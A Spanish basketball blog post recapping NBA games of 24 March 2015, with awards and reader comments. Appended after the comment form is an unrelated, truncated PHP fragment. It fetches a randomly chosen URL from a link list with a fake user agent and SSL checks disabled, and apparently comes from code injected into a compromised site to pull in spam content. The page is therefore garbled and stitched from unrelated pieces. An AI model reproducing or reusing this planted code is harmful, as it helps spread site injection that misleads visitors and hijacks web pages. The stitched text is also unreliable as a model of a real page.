La Crónica: El talento siempre se abre paso

24 de March de 2015 por MagicJohnson32

La octava posición del Este es algo así como el juego de la silla. La música empieza a sonar con cada jornada, y a su conclusión tenemos un equipo diferente ocupando ese puesto. Hoy son los Celtics, que frenaron el ascenso de los Nets y aprovecharon las derrotas de Hornets y Pacers. De los de Indiana hablaremos extensamente, aunque no por sus propios méritos (suman ya seis derrotas consecutivas), sino por encajar una nueva exhibición de James Harden. Pero antes nos ocuparemos de otro tipo barbudo.

pau_niko

Charlotte Hornets 86 – Chicago Bulls 98

El talento siempre se abre paso. Sirva Niko Mirotic como ejemplo de ello. Ni el regreso de Jimmy Butler después de tres semanas de baja ni su permanete rol como suplente frenaron lo más mínimo la emergencia de Mirotic como figura clave de los Bulls. El novato montenegrino, que continúa partiendo desde el banquillo, fue de nuevo el mejor aliado de Pau Gasol para batir a unos Hornets que dieron la cara en la primera mitad pero acabaron pagando los problemas físicos de Jefferson y cedieron ante la defensa local y la conexión Gasol-Mirotic. Entre el ex barcelonista y el ex madridista lograron 55 puntos (más de la mitad de la anotación de los Bulls), 20 rebotes, 5 asistencias y 5 tapones, una contribución insuperable por parte de un equipo que, más allá de los fogonazos de Kemba y Mo Williams, va muy justo de pólvora. La derrota cuesta a los Hornets la octava posición del Este, que pasa a manos de los Celtics. Los Bulls vuelven a mirar hacia arriba con 4 victorias en 5 partidos y en gran medida es gracias a Mirotic, que promedia 21 puntos en los 13 partidos disputados en marzo.

Houston Rockets 110 – Indiana Pacers 100

La de los Pacers es una de las mejores defensas de la liga. Ya lo era en temporadas recientes, cuando los Pacers aspiraban al trono del Este, y lo sigue siendo. Pero, por lo visto, nadie se lo ha explicado a James Harden. El escolta de los Rockets anotó 45 puntos en el enfrentamiento entre ambos equipos hace un par de meses en Houston y anoche se fue hasta los 44. Para ello, Harden desplegó su habitual catálogo ofensivo, esa combinación de lanzamientos de larga distancia, penetraciones y una capacidad inigualable para provocar faltas. 22 veces fue Harden a la línea de tiros libres, más que el total de los Pacers, una estadística clave en un encuentro ajustado gracias al buen hacer de George Hill y Hibbert. La completísima actuación de Hill equilibró el partido después de que Harden lo pusiera de cara para los Rockets con 15 puntos en el primer cuarto. Los locales remaron y llegaron a situarse a 2 (68-66) pero un parcial 8-2 para cerrar el tercer periodo y la actuación de Harden con 19 puntos en el último cuarto dejaron sin posibilidad de respuesta a unos Pacers que hace un par de semanas parecían lanzados hacia la postemporada y ahora se ven décimos, suman seis derrotas seguidas y tienen a los Nets a solo medio partido.

Resto de la jornada

Decíamos más arriba que los Celtics son los nuevos inquilinos de la última plaza de Playoffs en el Este. Lo merecen tras una victoria tan convincente como la lograda anoche en Brooklyn (110-91), donde estuvieron liderados por Evan Turner (autor de un triple doble) y contaron con seis jugadores en dobles figuras de anotación. La tunda de la jornada se la llevaron los Wizards en su visita al ORACLE. Ningún jugador de los Warriors permaneció más de 28 minutos en pista, que es todo lo que necesitó Curry para dar un nuevo recital. Los Wizards metieron 27 puntos en toda la segunda mitad y suman tres derrotas seguidas que alejan la posibilidad de disponer de ventaja de campo en primera ronda de Playoffs. También hubo paliza previsible en la visita de los Grizzlies al Madison, donde Marc Gasol y Zach Randolph camparon a sus anchas (103-82). El partido más emocionante y la sorpresa de la jornada fue la victoria de los Wolves en Salt Lake Cit (106-104). Un triple de LaVine forzó la prórroga y finalmente la ausencia por lesión de Hayward y el desacierto de Burke (4/22 TC) pesaron demasiado a los locales.

PREMIOS

MVP: Cada vez más candidato a MVP de la temporada, James Harden destrozó a los Pacers con 44 puntos (10 de 21 en TC, 21 de 22 en TL), 4 rebotes, 7 asistencias, 2 robos y 2 tapones.

Rookie: Uno que se va a llevar votos como ROY y Mejor 6º hombre es Nikola Mirotic, sensacional una vez más con 28 puntos (10 de 19 en tiros de campo, 7 de 10 en libres), 8 rebotes, 2 asistencias y 1 tapón.

Sorpresa: Es probable que no sepáis quién es Lorenzo Brown. No os sintáis mal por ello pero anoche fue de los mejores de los Wolves en la victoria en el EnergySolutions. 10 puntos, 7 rebotes, 6 asistencias y 2 robos logró este base que se está haciendo un hueco en las rotaciones de Saunders.

Decepción: Le necesitaban los Jazz más que nunca por la baja de Hayward, pero Trey Burke falló 18 de sus 22 lanzamientos, incluidos los que pudieron primero evitar la prórroga y después dar la victoria a los Jazz.

Mayor esfuerzo en vano: Brook Lopez fue el mejor de los Nets. Sólo 4 rebotes pero 31 puntos con 12 de 19 en tiros de campo y 2 tapones del pívot. Tampoco se les puede pedir más a Favors y Rudy Gobert, que no pudieron evitar la derrota ante los Wolves pese a acumular 37 puntos, 29 rebotes, 5 asistencias y 8 tapones entre ambos.

TOP 10

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. luismi_vallecas dice:
    #1

    Yo creo que los Celtics merecen el octavo puesto de PO este año. Con una plantilla hecha para tankear y con cambios cada 3 semanas tiene mucho mérito el llegar donde han llegado, además jugando bien y con mucha garra. Brad Stevens, tras un primer año que no se le podía evaluar con claridad, se está confirmando como un gran entrenador a nivel NBA y con potencial para gestionar una plantilla que pueda hacer cosas importantes en años venideros si llegan algunos cambios

      Citar

  2. Ruxixón dice:
    #2

    Pues si luismi_vallecas,tiene mérito lo de Stevens.En cuanto le han quitado a Rondo es como si pudiera trabajar más acorde a sus ideas y eso se nota en el equipo.De todas formas parecen lejos de conformar un equipo potente para que hagan cosas más allá de las que está peleando este año.A ver si Ainge sabe mover tanta ronda acumulada o encontrar a verdadera gente con talento con ellas.

    Es una pena que los señores Lopez no pudieran concentrar en un único hijo lo mejor de los 2: la clase en ataque de Brook con el currele defensivo de Robin,¡que pívot saldría de ahí! Brooklyn tiene una carencia importantísima.Tiene tantos jugadores de larga experiencia en la liga que parecen cansados para tirar de un proyecto.Brook Lopez que es,posiblemente,su mejor jugador tampoco parece que por personalidad sea capaz de dar ese paso adelante.Necesitan gente joven con ganas de comerse el mundo.Si es que Lance Stephenson es un fit cojonudo para ellos,simplemente por personalidad le da al equipo un plus.

      Citar

  3. Nacho dice:
    #3

    @Ruxixón.
    No sé cómo es la segunda parte de la temporada de Bogdanovic (por Box Score parece irregular, y tampoco entiendo los bailes en los titulares de Hollins) pero en los primeros partidos le vi muy bien, parecía el veterano del equipo, tiene ese carácter balcánico de tantos genios que han aparecido por allí, no es tirador pero lo hace, y los días inspirados parece Pedja, pero guerrea mucho y postea mejor, y no le tiembla la mano a la hora de tomar responsabilidades. Espero que en su segundo año tenga capacidad, y minutos, para el crecimiento. Creo que va a ser un jugador importante en la liga.

    Lo de Mirotic (que ya apuntó durante mucha parte de la temporada, y ya dijimos por aquí Azabel -Ay, Esteban- y yo) en este marzo es espectacular. Si sigue a este ritmo en estos 20 días que quedan, y sus puntos significan victorias para los Bulls, se merece el RoY. A sexto hombre no llegará, pero votos es cierto que se llevará. Yo esperaba mucho de él, y aún así me está sorprendiendo.

    Otro que lleva, por lo menos, un mes espectacular (al menos cuando lo he visto) es Redick. Un tipo que ha recibido muchas críticas, y que creo que demuestra que es un dos titular en un equipo con aspiraciones. Y le he visto hacer muchas más cosas que simplemente sumirse en el rol de blanco tirador.

    Y otra vez me desesperan los Pacers. Encadenan victorias de la misma manera que encadenan derrotas. Parecía que esa goma se había roto para arriba tras el AllStar, pero han vuelto a las andadas. Ya no sé que pensar de ellos.

      Citar

  4. Triceratops dice:
    #4

    Agree con Nacho, si Mirotic sigue 10 partidos más en este plan el ROY debería ser claramente para él. ¿Wiggins? Un tipo que se harta de perder partidos y tiene todos los minutos del mundo para tirarse tiros y hacer números… ¿Payton? Iden a Wiggins, aunque a la larga creo que ambos harán mas carrera NBA que el montenegrino.

    Agree otra vez con Nacho sobre lo de Redick. Yo pensé que haría aguas siendo titular en un equipo aspirante a anillo y su contrato acabaría siendo tóxico, pero me está callando la boca a base de buenas actuaciones.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>